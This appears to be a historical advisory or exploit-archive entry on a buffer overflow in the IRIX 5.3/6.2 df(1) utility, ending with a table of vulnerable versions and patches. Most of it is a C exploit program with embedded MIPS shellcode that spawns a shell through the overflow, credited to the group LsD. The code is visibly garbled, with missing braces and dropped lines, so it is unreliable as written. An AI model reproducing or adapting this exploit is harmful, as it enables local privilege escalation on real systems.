

    IRIX 5.3, 6.2 (R4000)


    df(1) is a program used to display statistics about the amount  of
    used and free disc space on file systems.

    Below is buffer overflow exploit  for IRIX machines.  It  works on
    5.3 and 6.2 on R4k, and don't  work on R8k and R10k (but I'm  sure
    it's not  hard at  all to  make them  to).   Credit goes to Polish
    group LsD.  Exploit follows:

    #include <stdlib.h>
    #include <fcntl.h>

    #define BUFSIZE 2061
    #define OFFS 800
    #define ADDRS 2
    #define ALIGN 0

    void run(unsigned char *buf) {

      execl("/usr/sbin/df", "df", buf, NULL);
      printf("execl failed\n");

    char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c";
    char nop[]="\x24\x0f\x12\x34";

    unsigned long get_sp(void) {
    __asm__("or     $2,$sp,$0");

    /* this align stuff sux - i do know. */
    main(int argc, char *argv[]) {
      char *buf, *ptr, addr[8];
      int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN;
      int i, noplen=strlen(nop);

      if (argc >1) bufsize=atoi(argv[1]);
      if (argc >2) offs=atoi(argv[2]);
      if (argc >3) addrs=atoi(argv[3]);
      if (argc >4) align=atoi(argv[4]);

      if (bufsize<strlen(asmcode)) {
        printf("bufsize too small, code is %d bytes long\n", strlen(asmcode));
      if ((buf=malloc(bufsize+ADDRS<<2+noplen+1))==NULL) {
        printf("Can't malloc\n");
      *(int *)addr=get_sp()+offs;
      printf("address - %p\n", *(int *)addr);

      strcpy(buf, nop);
      buf+=noplen-bufsize % noplen;
      bufsize-=bufsize % noplen;

      for (i=0; i<bufsize; i++)
        *ptr++=nop[i % noplen];
      memcpy(ptr-strlen(asmcode), asmcode, strlen(asmcode));
        memcpy(ptr, nop, strlen(nop));
      for (i=0; i<addrs<<2; i++)
        *ptr++=addr[i % sizeof(int)];
      printf("total buf len - %d\n", strlen(buf));



    Patches are:

        OS Version     Vulnerable?     Patch #      Other Actions
        ----------     -----------     -------      -------------
        IRIX 3.x          unknown      not avail    Upgrade
        IRIX 4.x          unknown      not avail    Upgrade
        IRIX 5.0.x        yes          not avail    Upgrade
        IRIX 5.1.x        yes          not avail    Upgrade
        IRIX 5.2          yes          not avail    Upgrade
        IRIX 5.3          yes          2224
        IRIX 6.0.x        yes          not avail    Upgrade
        IRIX 6.1          yes          not avail    Upgrade
        IRIX 6.2          yes          2177
        IRIX 6.3          yes          2232
        IRIX 6.4          yes          2233